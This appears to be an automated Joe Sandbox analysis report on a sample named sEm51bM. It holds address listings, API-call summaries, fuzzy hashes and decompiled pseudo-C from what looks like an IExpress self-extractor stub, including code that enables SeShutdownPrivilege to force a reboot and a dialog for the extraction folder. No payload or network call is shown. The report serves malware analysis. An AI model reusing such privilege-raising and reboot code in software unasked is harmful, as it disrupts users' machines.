                                                                                                                                                                                                                                            0x00326081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326087
                                                                                                                                                                                                                                            0x00326087
                                                                                                                                                                                                                                            0x0032608d
                                                                                                                                                                                                                                            0x0032609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003260a2
                                                                                                                                                                                                                                            0x003260aa
                                                                                                                                                                                                                                            0x003260b2
                                                                                                                                                                                                                                            0x003260b7
                                                                                                                                                                                                                                            0x003260bd
                                                                                                                                                                                                                                            0x003260bf
                                                                                                                                                                                                                                            0x003260bf
                                                                                                                                                                                                                                            0x003260d6
                                                                                                                                                                                                                                            0x003260e0
                                                                                                                                                                                                                                            0x003260e7
                                                                                                                                                                                                                                            0x003260f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003260f5
                                                                                                                                                                                                                                            0x0032609c
                                                                                                                                                                                                                                            0x00326081
                                                                                                                                                                                                                                            0x00325e62
                                                                                                                                                                                                                                            0x00325e62
                                                                                                                                                                                                                                            0x00325e65
                                                                                                                                                                                                                                            0x00325fd3
                                                                                                                                                                                                                                            0x00325fe9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fef
                                                                                                                                                                                                                                            0x00325fef
                                                                                                                                                                                                                                            0x00325ff7
                                                                                                                                                                                                                                            0x00325ffd
                                                                                                                                                                                                                                            0x00326003
                                                                                                                                                                                                                                            0x00326006
                                                                                                                                                                                                                                            0x00326011
                                                                                                                                                                                                                                            0x00326014
                                                                                                                                                                                                                                            0x0032603d
                                                                                                                                                                                                                                            0x00326016
                                                                                                                                                                                                                                            0x00326018
                                                                                                                                                                                                                                            0x00326019
                                                                                                                                                                                                                                            0x0032601b
                                                                                                                                                                                                                                            0x00326033
                                                                                                                                                                                                                                            0x0032601d
                                                                                                                                                                                                                                            0x00326020
                                                                                                                                                                                                                                            0x00326029
                                                                                                                                                                                                                                            0x00326022
                                                                                                                                                                                                                                            0x00326022

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00325CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00328B3E,00000104,00000000,?,?), ref: 00325DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00325E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00325EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00325F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00325FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00326008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 003260AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00321140,00000000,00000040,00000000), ref: 003261F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 003261F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 7de93b12946375b151e771b9bb9167b0b59a116f0541144489bc70f1aceb7eef
                                                                                                                                                                                                                                            • Instruction ID: bd2950bf3adc8e325e9c6c2b334bcb57c2642ede208c564ce7a158200c0048a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7de93b12946375b151e771b9bb9167b0b59a116f0541144489bc70f1aceb7eef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D15C71A08E749FDF378B38BC4D7F97769AF26300F1640AAC486D6591DA708F868B40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00321F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x329a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E003244B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00326CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E003244B9(0, 0x522, 0x321140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00321EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00321EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00321F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00321FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 08e7aa4e878d3d63de9275158213f97d1bc748a31785469ce3f9c45994e42420
                                                                                                                                                                                                                                            • Instruction ID: 70571a11984e137d6e7afe68c4cfd9c6a6969acdbfadb716f7320e736c23a3f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08e7aa4e878d3d63de9275158213f97d1bc748a31785469ce3f9c45994e42420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8212B71B402257BDB329BA1BE4AFBF77BCEB95B10F21011DFA02E6180D77488029261
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326CF0(char _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				_t1 =  &_a4; // 0x326e26
                                                                                                                                                                                                                                            				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00326E26,00321000), ref: 00326CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(&n2,?,00326E26,00321000), ref: 00326D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00326E26,00321000), ref: 00326D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00326E26,00321000), ref: 00326D12
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID: &n2
                                                                                                                                                                                                                                            • API String ID: 3231755760-4029215977
                                                                                                                                                                                                                                            • Opcode ID: 4ba6407e662acddad4c1473e096f5206c5f1cf87b4b0e9070008eb175266a939
                                                                                                                                                                                                                                            • Instruction ID: c6b2dbee57fe7ad9a045ad82799739b3511dc6bc9ac18e908a1e29c0b159fafb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ba6407e662acddad4c1473e096f5206c5f1cf87b4b0e9070008eb175266a939
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D0C932004908BBEB222BE1EC0CA593F2CEB48333F444008F31A82020CB3264628B52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00323210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E003243D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0x329a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3291e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E003244B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0x3291e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0x3291e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0x3291e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0x3291e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E0032658A(0x3291e4, 0x104, 0x321140);
                                                                                                                                                                                                                                            								_t27 = E003258C8(0x3291e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0x3291e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x3291e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E0032597D(0x3291e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x3291e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x3291e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E003244B9(_t64, 0x54a, 0x3291e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x3291e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x3291e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x3291e4 - 0x5c;
						if( *0x3291e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x329124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x329a3c, 0x3e8, 0x328598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00324224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3287a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E003244B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003233cc
                                                                                                                                                                                                                                            0x003233ad
                                                                                                                                                                                                                                            0x003233b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003233b4
                                                                                                                                                                                                                                            0x00323398
                                                                                                                                                                                                                                            0x00323399
                                                                                                                                                                                                                                            0x0032339b
                                                                                                                                                                                                                                            0x0032339c
                                                                                                                                                                                                                                            0x0032339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032339d
                                                                                                                                                                                                                                            0x0032334c
                                                                                                                                                                                                                                            0x00323351
                                                                                                                                                                                                                                            0x00323354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032335c
                                                                                                                                                                                                                                            0x00323362
                                                                                                                                                                                                                                            0x00323364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323366
                                                                                                                                                                                                                                            0x00323367
                                                                                                                                                                                                                                            0x00323369
                                                                                                                                                                                                                                            0x0032336a
                                                                                                                                                                                                                                            0x0032336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032336b
                                                                                                                                                                                                                                            0x0032331c
                                                                                                                                                                                                                                            0x00323323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323329
                                                                                                                                                                                                                                            0x0032332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032332b
                                                                                                                                                                                                                                            0x0032324c
                                                                                                                                                                                                                                            0x0032324c
                                                                                                                                                                                                                                            0x0032324f
                                                                                                                                                                                                                                            0x003232c8
                                                                                                                                                                                                                                            0x003232ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232ce
                                                                                                                                                                                                                                            0x00323251
                                                                                                                                                                                                                                            0x00323256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323271
                                                                                                                                                                                                                                            0x00323277
                                                                                                                                                                                                                                            0x00323279
                                                                                                                                                                                                                                            0x00323298
                                                                                                                                                                                                                                            0x0032329d
                                                                                                                                                                                                                                            0x0032329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232b0
                                                                                                                                                                                                                                            0x003232b6
                                                                                                                                                                                                                                            0x003232b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232be
                                                                                                                                                                                                                                            0x00323280
                                                                                                                                                                                                                                            0x00323289
                                                                                                                                                                                                                                            0x0032328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032328e
                                                                                                                                                                                                                                            0x0032327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00328598,00000200), ref: 00323271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003233E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 003233F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00323410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00323426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 0032342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0032343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                                                            • API String ID: 2418873061-481508614
                                                                                                                                                                                                                                            • Opcode ID: 2a5bf9f7b9a309132953cea4ca9135625270224167b44e941cf7b5d642049852
                                                                                                                                                                                                                                            • Instruction ID: f9427a57b481d1aa395ea89d47040ca6bd89dbcd109c270b57b12939f1730ac9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5bf9f7b9a309132953cea4ca9135625270224167b44e941cf7b5d642049852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99512630341370BBEB33AB367C4DF7B2A4D9B46B54F504429F645965C1CABC9B0292A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00322CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x329a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x329140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x328a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x3288c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x3293ec = 1;
                                                                                                                                                                                                                                            				_t20 = E0032468F("TITLE", 0x329154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x32858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x329a34;
                                                                                                                                                                                                                                            					if(E0032468F("EXTRACTOPT", 0x329a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x329a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x329120 =  *0x329120 & _t65;
